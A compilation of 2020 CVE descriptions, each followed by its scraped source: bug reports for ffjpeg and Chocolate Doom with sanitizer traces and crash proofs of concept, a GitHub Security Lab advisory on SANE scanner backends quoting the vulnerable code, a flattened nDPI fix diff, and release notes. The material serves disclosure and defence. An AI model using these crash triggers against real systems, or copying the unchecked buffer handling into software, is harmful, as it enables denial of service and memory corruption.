ffjpeg through 2020-02-24 has a heap-based buffer overflow in jfif_decode in jfif.c.

ffjpeg "jfif\_decode()" function heap-overflow vulnerability

Description:  
There is a heap-overflow bug in jfif\_decode(void \*ctxt, BMP \*pb) function at ffjpeg/src/jfif.c : line 516.  
An attacker can exploit this bug to cause a Denial of Service (DoS) by submitting a malicious jpeg image.  
The bug is caused by the following dangerous memcpy calling in jfif\_decode() function:  
for (i=0; i<8; i++) {  
memcpy(idst, isrc, 8 \* sizeof(int));  
idst += yuv\_stride\[c\];  
isrc += 8;  
}

We used AddressSanitizer instrumented in ffjpeg and triggered this bug, the asan output is:

**root@01964a1f36aa:~/ffjpeg/src# ./ffjpeg -d ../crashout/SIGABRT.PC.43a618.STACK.186c7604dd.CODE.-6.ADDR.0.INSTR.pushq\_\_$0x0.fuzz**

\==40906==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f3d587ffc00 at pc 0x0000004a6134 bp 0x7ffe72bc97d0 sp 0x7ffe72bc8f80  
WRITE of size 32 at 0x7f3d587ffc00 thread T0  
#0 0x4a6133 in \_\_asan\_memcpy /root/llvm-project/llvm/projects/compiler/lib/asan/asan\_interceptors\_memintrinsics.cc:22  
#1 0x4f24df in jfif\_decode (/root/ffjpeg/src/ffjpeg+0x4f24df)  
#2 0x4eb545 in main (/root/ffjpeg/src/ffjpeg+0x4eb545)  
#3 0x7f3d5badeb96 in \_\_libc\_start\_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310  
#4 0x41ac89 in \_start (/root/ffjpeg/src/ffjpeg+0x41ac89)

0x7f3d587ffc00 is located 1024 bytes to the right of 4194304-byte region \[0x7f3d583ff800,0x7f3d587ff800)  
allocated by thread T0 here:  
#0 0x4a71a0 in malloc /root/llvm-project/llvm/projects/compiler/lib/asan/asan\_malloc\_linux.cc:145  
#1 0x4f132b in jfif\_decode (/root/ffjpeg/src/ffjpeg+0x4f132b)  
#2 0x4eb545 in main (/root/ffjpeg/src/ffjpeg+0x4eb545)  
#3 0x7f3d5badeb96 in \_\_libc\_start\_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/llvm-project/llvm/projects/compiler/lib/asan/asan\_interceptors\_memintrinsics.cc:22 in \_\_asan\_memcpy  
Shadow bytes around the buggy address:  
0x0fe82b0f7f30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0fe82b0f7f40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0fe82b0f7f50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0fe82b0f7f60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0fe82b0f7f70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
\=>0x0fe82b0f7f80:\[fa\]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0fe82b0f7f90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0fe82b0f7fa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0fe82b0f7fb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0fe82b0f7fc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0fe82b0f7fd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05 06 07  
Heap left redzone: fa  
Freed heap region: fd  
Stack left redzone: f1  
Stack mid redzone: f2  
Stack right redzone: f3  
Stack after return: f5  
Stack use after scope: f8  
Global redzone: f9  
Global init order: f6  
Poisoned by user: f7  
Container overflow: fc  
Array cookie: ac  
Intra object redzone: bb  
ASan internal: fe  
Left alloca redzone: ca  
Right alloca redzone: cb  
Shadow gap: cc  
\==40906==ABORTING

ASAN telled us there is a heap-buffer-overflow on 0x4f24df in jfif\_decode (/root/ffjpeg/src/ffjpeg+0x4f24df)  
Then we used IDA to locate this triggered bug.  
  
Lastly, we used GDB to debug this bug, the GDB outputs:  
gdb-peda$ b \* 0x4f24df  
Breakpoint 1 at 0x4f24df  
gdb-peda$ r  
Starting program: /root/ffjpeg/src/ffjpeg -d hh  
\[Thread debugging using libthread\_db enabled\]  
Using host libthread\_db library "/lib/x86\_64-linux-gnu/libthread\_db.so.1".

Program received signal SIGSEGV, Segmentation fault.

\[----------------------------------registers-----------------------------------\]  
RAX: 0x7ffff36ff800 --> 0xbebebebebebebebe  
RBX: 0x7fffffffdd00 --> 0x3e7620 (' v>')  
RCX: 0x7fffffffdbc0 --> 0x7ad90c007af07c  
RDX: 0x20 (' ')  
RSI: 0x7fffffffdbc0 --> 0x7ad90c007af07c  
RDI: 0x7ffff36ff800 --> 0xbebebebebebebebe  
RBP: 0x7fffffffe3d0 --> 0x7fffffffe510 --> 0x501c10 (<\_\_libc\_csu\_init>: push r15)  
RSP: 0x7fffffffda58 --> 0x4f24e0 (<jfif\_decode+8448>: movsxd rcx,DWORD PTR \[rbx+0x638\])  
RIP: 0xffffffffcd4a5e60  
R8 : 0xc2a00000000 --> 0x0  
R9 : 0x0  
R10: 0x10007fff7b98 --> 0xf3f3f3f3f3f3f3f3  
R11: 0x10007fff7b78 --> 0x0  
R12: 0x7fffffffe400 --> 0x0  
R13: 0x80  
R14: 0x10007fff7b4c --> 0xf1f1f1f1 --> 0x0  
R15: 0x615000000080 --> 0xffff0000ffee  
EFLAGS: 0x10293 (CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow)  
\[-------------------------------------code-------------------------------------\]  
Invalid $PC address: 0xffffffffcd4a5e60  
\[------------------------------------stack-------------------------------------\]  
0000| 0x7fffffffda58 --> 0x4f24e0 (<jfif\_decode+8448>: movsxd rcx,DWORD PTR \[rbx+0x638\])  
0008| 0x7fffffffda60 --> 0x41b58ab3  
0016| 0x7fffffffda68 --> 0x5155e8 ("6 32 128 4 ftab 192 16 2 dc 224 12 10 yuv\_stride 256 12 10 yuv\_height 288 24 10 yuv\_datbuf 352 256 2 du")  
0024| 0x7fffffffda70 --> 0x4f03e0 (<jfif\_decode>: push rbp)  
0032| 0x7fffffffda78 --> 0x3a (':')  
0040| 0x7fffffffda80 --> 0x6110000002c0 --> 0xc7b00000d00 --> 0x0  
0048| 0x7fffffffda88 --> 0x611000000400 --> 0x136b00000e00  
0056| 0x7fffffffda90 --> 0x0  
\[------------------------------------------------------------------------------\]  
Legend: code, data, rodata, value  
Stopped reason: SIGSEGV  
0xffffffffcd4a5e60 in ?? ()

We ensured there is a heap overflow because of the dangerous using of memcpy function, attacker can use this bug to finish a DoS attack.

You can reproduce this heap overflow vulnerability by the follow step:  
ffjpeg -d PoC\_heapoverflow1\_ffjpeg

CVE-2020-15470: ffjpeg "jfif_decode()" function heap-overflow vulnerability · Issue #26 · rockcarry/ffjpeg

In nDPI through 3.2, the H.323 dissector is vulnerable to a heap-based buffer over-read in ndpi_search_h323 in lib/protocols/h323.c, as demonstrated by a payload packet length that is too short.

@@ -1,7 +1,7 @@ /\* \* h323.c \* \* Copyright (C) 2015-18 ntop.org \* Copyright (C) 2015-20 ntop.org \* Copyright (C) 2013 Remy Mudingay <mudingay@ill.fr> \* \*/ @@ -36,37 +36,37 @@ void ndpi\_search\_h323(struct ndpi\_detection\_module\_struct \*ndpi\_struct, struct n if(packet->payload\_packet\_len >= 4 && (packet->payload\[0\] == 0x03) && (packet->payload\[1\] == 0x00)) { struct tpkt \*t = (struct tpkt\*)packet->payload; u\_int16\_t len = ntohs(t->len);  
if(packet->payload\_packet\_len == len) { /\* We need to check if this packet is in reality a RDP (Remote Desktop) packet encapsulated on TPTK \*/  
if(packet->payload\[4\] == (packet->payload\_packet\_len - sizeof(struct tpkt) - 1)) { /\* ISO 8073/X.224 \*/ if((packet->payload\[5\] == 0xE0 /\* CC Connect Request \*/) || (packet->payload\[5\] == 0xD0 /\* CC Connect Confirm \*/)) { NDPI\_LOG\_INFO(ndpi\_struct, "found RDP\\n"); ndpi\_set\_detected\_protocol(ndpi\_struct, flow, NDPI\_PROTOCOL\_RDP, NDPI\_PROTOCOL\_UNKNOWN); return; } struct tpkt \*t = (struct tpkt\*)packet->payload; u\_int16\_t len = ntohs(t->len);  
if(packet->payload\_packet\_len == len) { /\* We need to check if this packet is in reality a RDP (Remote Desktop) packet encapsulated on TPTK \*/  
if(packet->payload\[4\] == (packet->payload\_packet\_len - sizeof(struct tpkt) - 1)) { /\* ISO 8073/X.224 \*/ if((packet->payload\[5\] == 0xE0 /\* CC Connect Request \*/) || (packet->payload\[5\] == 0xD0 /\* CC Connect Confirm \*/)) { NDPI\_LOG\_INFO(ndpi\_struct, "found RDP\\n"); ndpi\_set\_detected\_protocol(ndpi\_struct, flow, NDPI\_PROTOCOL\_RDP, NDPI\_PROTOCOL\_UNKNOWN); return; } }  
flow->l4.tcp.h323\_valid\_packets++; flow->l4.tcp.h323\_valid\_packets++;  
if(flow->l4.tcp.h323\_valid\_packets >= 2) { NDPI\_LOG\_INFO(ndpi\_struct, "found H323 broadcast\\n"); ndpi\_set\_detected\_protocol(ndpi\_struct, flow, NDPI\_PROTOCOL\_H323, NDPI\_PROTOCOL\_UNKNOWN); } } else { /\* This is not H.323 \*/ NDPI\_EXCLUDE\_PROTO(ndpi\_struct, flow); return; if(flow->l4.tcp.h323\_valid\_packets >= 2) { NDPI\_LOG\_INFO(ndpi\_struct, "found H323 broadcast\\n"); ndpi\_set\_detected\_protocol(ndpi\_struct, flow, NDPI\_PROTOCOL\_H323, NDPI\_PROTOCOL\_UNKNOWN); } } else { /\* This is not H.323 \*/ NDPI\_EXCLUDE\_PROTO(ndpi\_struct, flow); return; } } } else if(packet->udp != NULL) { sport = ntohs(packet->udp\->source), dport = ntohs(packet->udp\->dest); NDPI\_LOG\_DBG2(ndpi\_struct, "calculated dport over udp\\n"); @@ -80,28 +80,25 @@ void ndpi\_search\_h323(struct ndpi\_detection\_module\_struct \*ndpi\_struct, struct n return; } /\* H323 \*/ if(sport == 1719 || dport == 1719) { if(packet->payload\[0\] == 0x16 && packet->payload\[1\] == 0x80 && packet->payload\[4\] == 0x06 && packet->payload\[5\] == 0x00) { NDPI\_LOG\_INFO(ndpi\_struct, "found H323 broadcast\\n"); ndpi\_set\_detected\_protocol(ndpi\_struct, flow, NDPI\_PROTOCOL\_H323, NDPI\_PROTOCOL\_UNKNOWN); return; } else if(packet->payload\_packet\_len >= 20 && packet->payload\_packet\_len <= 117) { NDPI\_LOG\_INFO(ndpi\_struct, "found H323 broadcast\\n"); ndpi\_set\_detected\_protocol(ndpi\_struct, flow, NDPI\_PROTOCOL\_H323, NDPI\_PROTOCOL\_UNKNOWN); return; } else { NDPI\_EXCLUDE\_PROTO(ndpi\_struct, flow); return; } if(sport == 1719 || dport == 1719) { if((packet->payload\_packet\_len >= 5) && (packet->payload\[0\] == 0x16) && (packet->payload\[1\] == 0x80) && (packet->payload\[4\] == 0x06) && (packet->payload\[5\] == 0x00)) { NDPI\_LOG\_INFO(ndpi\_struct, "found H323 broadcast\\n"); ndpi\_set\_detected\_protocol(ndpi\_struct, flow, NDPI\_PROTOCOL\_H323, NDPI\_PROTOCOL\_UNKNOWN); return; } else if(packet->payload\_packet\_len >= 20 && packet->payload\_packet\_len <= 117) { NDPI\_LOG\_INFO(ndpi\_struct, "found H323 broadcast\\n"); ndpi\_set\_detected\_protocol(ndpi\_struct, flow, NDPI\_PROTOCOL\_H323, NDPI\_PROTOCOL\_UNKNOWN); return; } else { NDPI\_EXCLUDE\_PROTO(ndpi\_struct, flow); return; } } }  
}  
void init\_h323\_dissector(struct ndpi\_detection\_module\_struct \*ndpi\_struct, u\_int32\_t \*id, NDPI\_PROTOCOL\_BITMASK \*detection\_bitmask)

CVE-2020-15472: Added fix to avoid potential heap buffer overflow in H.323 dissector · ntop/nDPI@b7e666e

PuTTY 0.68 through 0.73 has an Observable Discrepancy leading to an information leak in the algorithm negotiation. This allows man-in-the-middle attackers to target initial connection attempts (where no host key for the server has been cached by the client).

CVE-2020-14002: PuTTY Change Log

An issue was discovered in OpenEXR before v2.5.2. Invalid chunkCount attributes could cause a heap buffer overflow in getChunkOffsetTableSize() in IlmImf/ImfMisc.cpp.

CVE-2020-15306: openexr/CHANGES.md at main · AcademySoftwareFoundation/openexr

Pillow before 7.1.0 has multiple out-of-bounds reads in libImaging/FliDecode.c.

Back to top

Edit this page

Toggle table of contents sidebar

**API Changes#**

**Allow saving of zero quality JPEG images#**

If no quality was specified when saving a JPEG, Pillow internally used a value of zero to indicate that the default quality should be used. However, this removed the ability to actually save a JPEG with zero quality. This has now been resolved.

from PIL import Image
im \= Image.open("hopper.jpg")
im.save("out.jpg", quality\=0)

**API Additions#**

**New channel operations#**

Three new channel operations have been added: soft_light(), hard_light() and overlay().

**PILLOW\_VERSION constant#**

PILLOW_VERSION has been re-added but is deprecated and will be removed in a future release. Use __version__ instead.

It was initially removed in Pillow 7.0.0, but brought back in 7.1.0 to give projects more time to upgrade.

**Support for different charset encodings in PcfFontFile#**

Previously PcfFontFile output only bitmap PIL fonts with ISO 8859-1 encoding, even though the PCF format supports Unicode, making it hard to work with Pillow with bitmap fonts in languages which use different character sets.

Now it’s possible to set a different charset encoding in PcfFontFile’s class constructor. By default, it generates a PIL font file with ISO 8859-1 as before. The generated PIL font file still contains up to 256 characters, but the character set is different depending on the selected encoding.

To use such a font with ImageDraw.text, call it with a bytes object with the same encoding as the font file.

**X11 ImageGrab.grab()#**

Support has been added for ImageGrab.grab() on Linux using the X server with the XCB library.

An optional xdisplay parameter has been added to select the X server, with the default value of None using the default X server.

Passing a different value on Windows or macOS will force taking a snapshot using the selected X server; pass an empty string to use the default X server. XCB support is not included in pre-compiled wheels for Windows and macOS.

**Security#**

This release includes security fixes.

*   CVE-2020-10177 Fix multiple out-of-bounds reads in FLI decoding
    
*   CVE-2020-10378 Fix bounds overflow in PCX decoding
    
*   CVE-2020-10379 Fix two buffer overflows in TIFF decoding
    
*   CVE-2020-10994 Fix bounds overflow in JPEG 2000 decoding
    
*   CVE-2020-11538 Fix buffer overflow in SGI-RLE decoding
    

**Other Changes#**

**If present, only use alpha channel for bounding box#**

When the getbbox() method calculates the bounding box, for an RGB image it trims black pixels. Similarly, for an RGBA image it would trim black transparent pixels. This is now changed so that if an image has an alpha channel (RGBA, RGBa, PA, LA, La), any transparent pixels are trimmed.

**Improved APNG support#**

Added support for reading and writing Animated Portable Network Graphics (APNG) images. The PNG plugin now supports using the seek() method and the Iterator class to read APNG frame sequences. The PNG plugin also now supports using the append_images argument to write APNG frame sequences. See APNG sequences for further details.

CVE-2020-10177: 7.1.0

An out-of-bounds read in SANE Backends before 1.0.30 may allow a malicious device connected to the same local network as the victim to read important information, such as the ASLR offsets of the program, aka GHSL-2020-082.

**Summary**

SANE Backends contains several memory corruption vulnerabilities which can be triggered by a malicious device or computer that is connected to the same network. The vulnerabilities are triggered when an application such as simple-scan searches the network for scanners. In the specific case of simple-scan, this happens immediately when simple-scan starts, so there isn’t even any need to trick the user into thinking that the scanner is genuine so that they will click on it.

We have also identified some other vulnerabilities in SANE Backends, which are less severe because they _do_ require the user to click the “Scan” button after connecting to a malicious device.

**Product**

SANE Backends

**Tested Version**

libsane1 1.0.27-1~experimental3ubuntu2.2, tested on Ubuntu 18.04.4 LTS with simple-scan 3.28.0-0ubuntu1.

**Details****Issue 1 (GHSL-2020-075, CVE-2020-12867): null pointer dereference in sanei_epson_net_read**

The function sanei_epson_net_read has buggy code for handling the situation where it receives a response with an unexpected size:

    /* receive net header */
    size = sanei_epson_net_read_raw(s, header, 12, status);
    if (size != 12) {
      return 0;
    }
    
    if (header[0] != 'I' || header[1] != 'S') {
      DBG(1, "header mismatch: %02X %02x\n", header[0], header[1]);
      *status = SANE_STATUS_IO_ERROR;
      return 0;
    }
    
    size = be32atoh(&header[6]);  <===== size is controlled by attacker
    
    DBG(23, "%s: wanted = %lu, available = %lu\n", __func__,
      (u_long) wanted, (u_long) size);
    
    *status = SANE_STATUS_GOOD;
    
    if (size == wanted) {
    
      DBG(15, "%s: full read\n", __func__);
    
      read = sanei_epson_net_read_raw(s, buf, size, status);
    
      if (s->netbuf) {
        free(s->netbuf);
        s->netbuf = NULL;
        s->netlen = 0;
      }
    
      if (read < 0) {
        return 0;
      }
    
    /*  } else if (wanted < size && s->netlen == size) { */
    } else {
      DBG(23, "%s: partial read\n", __func__);
    
      read = sanei_epson_net_read_raw(s, s->netbuf, size, status);  <===== s->netbuf could be NULL
      if (read != size) {
        return 0;
      }
    
      s->netlen = size - wanted;
      s->netptr += wanted;
      read = wanted;
    
      DBG(23, "0,4 %02x %02x\n", s->netbuf[0], s->netbuf[4]);  <===== s->netbuf could be NULL
      DBG(23, "storing %lu to buffer at %p, next read at %p, %lu bytes left\n",
        (u_long) size, s->netbuf, s->netptr, (u_long) s->netlen);
    
      memcpy(buf, s->netbuf, wanted);
    }
    
    return read;
    

Notice that the value of size is read from an incoming message, so an attacker can set it to any value they like. In the else branch, which handles the case where size != wanted, there is no check that s->netbuf is large enough for size bytes. This could potentially lead to a buffer overflow. However, our proof-of-concept exploit for this bug triggers a case where s->netbuf hasn’t even been initialized so the program crashes due to a null pointer dereference, rather than a buffer overflow.

**Impact**

This issue may lead to remote denial of service, where “remote” means a device or computer connected to the same network as the victim. For example, in a typical office environment the malicious device would need to be somewhere inside the building. Because the vulnerability causes simple-scan to crash as soon as it starts, it makes the application unusable.

**Issue 2 (GHSL-2020-079, CVE-2020-12866): null pointer dereference in epsonds_net_read**

The function epsonds_net_read has buggy code for handling the situation where it receives a response with an unexpected size:

    /* receive net header */
    size = epsonds_net_read_raw(s, header, 12, status);
    if (size != 12) {
      return 0;
    }
    
    if (header[0] != 'I' || header[1] != 'S') {
      DBG(1, "header mismatch: %02X %02x\n", header[0], header[1]);
      *status = SANE_STATUS_IO_ERROR;
      return 0;
    }
    
    // incoming payload size
    size = be32atoh(&header[6]);
    
    DBG(23, "%s: wanted = %lu, available = %lu\n", __func__,
      (u_long) wanted, (u_long) size);
    
    *status = SANE_STATUS_GOOD;
    
    if (size == wanted) {
    
      DBG(15, "%s: full read\n", __func__);
    
      if (size) {
        read = epsonds_net_read_raw(s, buf, size, status);
      }
    
      if (s->netbuf) {
        free(s->netbuf);
        s->netbuf = NULL;
        s->netlen = 0;
      }
    
      if (read < 0) {
        return 0;
      }
    
    } else if (wanted < size) {
    
      DBG(23, "%s: long tail\n", __func__);
    
      read = epsonds_net_read_raw(s, s->netbuf, size, status);  <===== no bounds check
      if (read != size) {
        return 0;
      }
    
      memcpy(buf, s->netbuf, wanted);
      read = wanted;
    
      free(s->netbuf);
      s->netbuf = NULL;
      s->netlen = 0;
    
    } else {
    
      DBG(23, "%s: partial read\n", __func__);
    
      read = epsonds_net_read_raw(s, s->netbuf, size, status);
      if (read != size) {
        return 0;
      }
    
      s->netlen = size - wanted;  <===== negative integer overflow (because size < wanted)
      s->netptr += wanted;
      read = wanted;
    
      DBG(23, "0,4 %02x %02x\n", s->netbuf[0], s->netbuf[4]);
      DBG(23, "storing %lu to buffer at %p, next read at %p, %lu bytes left\n",
        (u_long) size, s->netbuf, s->netptr, (u_long) s->netlen);
    
      memcpy(buf, s->netbuf, wanted);  <===== no bounds check
    }
    
    return read;
    

This code is very similar to the code in epson2_net.c (see issue 1) and has similar bugs. The first of these is a NULL pointer exception at epsonds-net.c, line 160.

**Impact**

This issue may lead to remote denial of service, where “remote” means a device or computer connected to the same network as the victim. For example, in a typical office environment the malicious device would need to be somewhere inside the building. Because the vulnerability causes simple-scan to crash as soon as it starts, it makes the application unusable.

**Issue 3 (GHSL-2020-080, CVE-2020-12861): heap buffer overflow in epsonds_net_read**

This bug is in the same function as issue 2: epsonds_net_read. There is a heap buffer overflow at epsonds-net.c, line 135. The value of size is controlled by the attacker, so an arbitrary amount of attacker-controlled data is written to s->netbuf.

**Impact**

This issue may lead to remote code execution, where “remote” means a device or computer connected to the same network as the victim. For example, in a typical office environment the malicious device would need to be somewhere inside the building.

**Issue 4 (GHSL-2020-081, CVE-2020-12864): reading uninitialized data in epsonds_net_read**

This bug is in the same function as issue 2: epsonds_net_read. The memcpy at epsonds-net.c, line 164 can read uninitialized data. The value of size is controlled by the attacker, so the attacker can specify that size == 0. Since s->netbuf is a newly allocated heap buffer, it contains uninitialized memory.

**Impact**

By itself, the severity of this issue is very low. However, it may be very useful to an attacker who is attempting to exploit one of the buffer overflow vulnerabilities, such as issue 3, because it may enable the attacker to obtain the ASLR offsets of the program.

**Issue 5 (GHSL-2020-082, CVE-2020-12862): out-of-bounds read in decode_binary**

The function decode_binary has an out-of-bounds read:

    /* h000 */
    static char *decode_binary(char *buf)
    {
      char tmp[6];
      int hl;
    
      memcpy(tmp, buf, 4);
      tmp[4] = '\0';
    
      if (buf[0] != 'h')
        return NULL;
    
      hl = strtol(tmp + 1, NULL, 16);
      if (hl) {
    
        char *v = malloc(hl + 1);
        memcpy(v, buf + 4, hl);
        v[hl] = '\0';
    
        return v;
      }
    
      return NULL;
    }
    

The value of hl is controlled by the attacker and can be any value between 0 and 0xFFF (4095). buf is a pointer to a 64 byte stack buffer (rbuf in esci2_cmd), so the memcpy at line 273 can copy up to 4095 bytes from the stack into the newly allocated buffer.

**Impact**

By itself, the severity of this issue is very low. However, it may be very useful to an attacker who is attempting to exploit one of the buffer overflow vulnerabilities, such as issue 3, because it may enable the attacker to obtain the ASLR offsets of the program.

esci2_check_header uses sscanf to read a number from the message:

    /* INFOx0000100#.... */
    
    /* read the answer len */
    if (buf[4] != 'x') {
      DBG(1, "unknown type in header: %c\n", buf[4]);
      return 0;
    }
    
    err = sscanf(&buf[5], "%x#", more);
    if (err != 1) {
      DBG(1, "cannot decode length from header\n");
      return 0;
    }
    

buf is a pointer to a 64 byte stack buffer (rbuf in esci2_cmd), the contents of which are entirely controlled by the attacker. If the attacker fills the buffer with the character ‘0’, then sscanf will read off the end of the buffer. If the characters beyond the buffer are valid hexadecimal digits, then they will be converted to a number and written to the variable named more. The value of more is included in the next message that is sent to the malicious device, so this issue is an information leak vulnerability.

**Impact**

This issue may lead to remote information disclosure, where “remote” means a device or computer connected to the same network as the victim. In practice, though, this issue is very low severity, because the byte immediately following the buffer is usually not a valid hexadecimal digit, so no information disclosure occurs.

**Issue 7 (GHSL-2020-084, CVE-2020-12865): buffer overflow in esci2_img**

This issue requires the user to click the “Scan” button, so it is a one-click vulnerability, rather than a zero-click vulnerability. The function esci2_img has a heap buffer overflow:

    SANE_Status
    esci2_img(struct epsonds_scanner *s, SANE_Int *length)
    {
      SANE_Status status = SANE_STATUS_GOOD;
      SANE_Status parse_status;
      unsigned int more;
      ssize_t read;
    
      *length = 0;
    
      if (s->canceling)
        return SANE_STATUS_CANCELLED;
    
      /* request image data */
      eds_send(s, "IMG x0000000", 12, &status, 64);
      if (status != SANE_STATUS_GOOD) {
        return status;
      }
    
      /* receive DataHeaderBlock */
      memset(s->buf, 0x00, 64);
      eds_recv(s, s->buf, 64, &status);
      if (status != SANE_STATUS_GOOD) {
        return status;
      }
    
      /* check if we need to read any image data */
      more = 0;
      if (!esci2_check_header("IMG ", (char *)s->buf, &more)) {  <===== attacker controls value of `more`
        return SANE_STATUS_IO_ERROR;
      }
    
      /* this handles eof and errors */
      parse_status = esci2_parse_block((char *)s->buf + 12, 64 - 12, s, &img_cb);
    
      /* no more data? return using the status of the esci2_parse_block
       * call, which might hold other error conditions.
       */
      if (!more) {
        return parse_status;
      }
    
      /* ALWAYS read image data */
      if (s->hw->connection == SANE_EPSONDS_NET) {
        epsonds_net_request_read(s, more);
      }
    
      read = eds_recv(s, s->buf, more, &status);  <===== heap buffer overflow
      if (status != SANE_STATUS_GOOD) {
        return status;
      }
    
      if (read != more) {
        return SANE_STATUS_IO_ERROR;
      }
    
      /* handle esci2_parse_block errors */
      if (parse_status != SANE_STATUS_GOOD) {
        return parse_status;
      }
    
      DBG(15, "%s: read %lu bytes, status: %d\n", __func__, (unsigned long) read, status);
    
      *length = read;
    
      if (s->canceling) {
        return SANE_STATUS_CANCELLED;
      }
    
      return SANE_STATUS_GOOD;
    }
    

**Impact**

This issue may lead to remote code execution, where “remote” means a device or computer connected to the same network as the victim. For example, in a typical office environment the malicious device would need to be somewhere inside the building.

**CVEs**

*   GHSL-2020-075 -> CVE-2020-12867
*   GHSL-2020-079 -> CVE-2020-12866
*   GHSL-2020-080 -> CVE-2020-12861
*   GHSL-2020-081 -> CVE-2020-12864
*   GHSL-2020-082 -> CVE-2020-12862
*   GHSL-2020-083 -> CVE-2020-12863
*   GHSL-2020-084 -> CVE-2020-12865

**Coordinated Disclosure Timeline**

This report was subject to the GHSL coordinated disclosure policy.

*   2020-04-21 reported: https://gitlab.com/sane-project/backends/-/issues/279
*   2020-04-21 acknowledged by Olaf Meeuwissen
*   2020-05-14 CVE request submitted to Mitre
*   2020-05-17 bugs announced on http://www.sane-project.org/ and on their mailing list
*   2020-05-30 issue 279 is derestricted. The original PoC is attached to the issue and is therefore also publicly visible.

**Resources**

*   https://gitlab.com/sane-project/backends/-/issues/279
*   https://alioth-lists.debian.net/pipermail/sane-announce/2020/000041.html
*   https://github.com/github/securitylab/tree/38b182e96a48f19b412039c0b321d6faec2b5c55/SecurityExploits/SANE/epsonds\_CVE-2020-12861

**Credit**

These issues were discovered and reported by GHSL team member @kevinbackhouse (Kevin Backhouse).

You can contact the GHSL team at securitylab@github.com, please include the relevant GHSL IDs in any communication regarding these issues.

CVE-2020-12862: GHSL-2020-075, GHSL-2020-079, GHSL-2020-080, GHSL-2020-081, GHSL-2020-082, GHSL-2020-083, GHSL-2020-084: Multiple vulnerabilities in SANE Backends (DoS, RCE)

An out-of-bounds read in SANE Backends before 1.0.30 may allow a malicious device connected to the same local network as the victim to read important information, such as the ASLR offsets of the program, aka GHSL-2020-081.

CVE-2020-12864: GHSL-2020-075, GHSL-2020-079, GHSL-2020-080, GHSL-2020-081, GHSL-2020-082, GHSL-2020-083, GHSL-2020-084: Multiple vulnerabilities in SANE Backends (DoS, RCE)

The server in Chocolate Doom 3.0.0 and Crispy Doom 5.8.0 doesn't validate the user-controlled num_players value, leading to a buffer overflow. A malicious user can overwrite the server's stack.

**Background**

Version of Chocolate Doom:

*   Chocolate Doom 3.0.0 (from the website)
*   Chocolate Doom git revision 5bf73c4
*   confirmed also in: Crispy Doom 5.8.0

Operating System and version: Ubuntu 18.04 x86-64

Compilation: CFLAGS="-fsanitize=address -ggdb -O0" LDFLAGS="-fsanitize=address" ./configure --prefix=pwd/bin

Game: (Doom/Heretic/Hexen/Strife/other) FreeDM

**Bug description**

When the client starts the game, it sends its settings using the NET_WriteSettings function. The server receives and parses it in the NET_ReadSettings function. The settings packet consist of the num_players integer. This value is used as an maximum value while iterating over corresponding settings and writing them to the player_classes fixed sized (8 elements) array.

    File: src/net_structrw.c
    091: boolean NET_ReadSettings(net_packet_t *packet, net_gamesettings_t *settings)
    092: {
    093:     boolean success;
    094:     int i;
    095: 
    096:     success = NET_ReadInt8(packet, (unsigned int *) &settings->ticdup)
    (...)
    111:            && NET_ReadInt8(packet, (unsigned int *) &settings->num_players)
    (...)
    119:     for (i = 0; i < settings->num_players; ++i)
    120:     {
    121:         if (!NET_ReadInt8(packet,
    122:                           (unsigned int *) &settings->player_classes[i]))
    123:         {
    124:             return false;
    125:         }
    126:     }
    127: 
    128:     return true;
    129: }
    

    File: src/net_defs.h
    37: #define NET_MAXPLAYERS 8
    [...]
    186: typedef struct
    187: {
    [...]
    211: 
    212:     int player_classes[NET_MAXPLAYERS];
    213: 
    214: } net_gamesettings_t;
    

The client can send any byte value and fill the packet with additional bytes to write outside the array and cause stack-based buffer overflow.

PoC:  
Modified client's code:

    --- a/src/net_structrw-b.c
    +++ b/src/net_structrw.c
    @@ -79,13 +79,16 @@ void NET_WriteSettings(net_packet_t *packet, net_gamesettings_t *settings)
         NET_WriteInt32(packet, settings->timelimit);
         NET_WriteInt8(packet, settings->loadgame);
         NET_WriteInt8(packet, settings->random);
    -    NET_WriteInt8(packet, settings->num_players);
    +    NET_WriteInt8(packet, settings->num_players+100);
         NET_WriteInt8(packet, settings->consoleplayer);
     
         for (i = 0; i < settings->num_players; ++i)
         {
             NET_WriteInt8(packet, settings->player_classes[i]);
         }
    +    for (i = 0; i < 100; i++) {
    +       NET_WriteInt8(packet, 0xaa);
    +    }
     }
    

When all of the clients are connected and the owner starts the game, the server crashes.

    ./chocolate-server
    ./chocolate-doom -iwad ~/freedm.wad -window -nomouse -connect 127.0.0.1 -nodes 1
    

Chocolate Doom ASAN:

    ==22788==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff357bea94 at pc 0x560b7e6bfb06 bp 0x7fff357be9a0 sp 0x7fff357be990
    WRITE of size 4 at 0x7fff357bea94 thread T0
        #0 0x560b7e6bfb05 in NET_ReadInt8 /home/mmm/projects/chocolate-doom-3.0.0/src/net_packet.c:78
        #1 0x560b7e6cb992 in NET_ReadSettings /home/mmm/projects/chocolate-doom-3.0.0/src/net_structrw.c:121
        #2 0x560b7e6c7656 in NET_SV_ParseGameStart /home/mmm/projects/chocolate-doom-3.0.0/src/net_server.c:921
        #3 0x560b7e6c91c3 in NET_SV_Packet /home/mmm/projects/chocolate-doom-3.0.0/src/net_server.c:1408
        #4 0x560b7e6ca87f in NET_SV_Run /home/mmm/projects/chocolate-doom-3.0.0/src/net_server.c:1813
        #5 0x560b7e6bf102 in NET_DedicatedServer /home/mmm/projects/chocolate-doom-3.0.0/src/net_dedicated.c:74
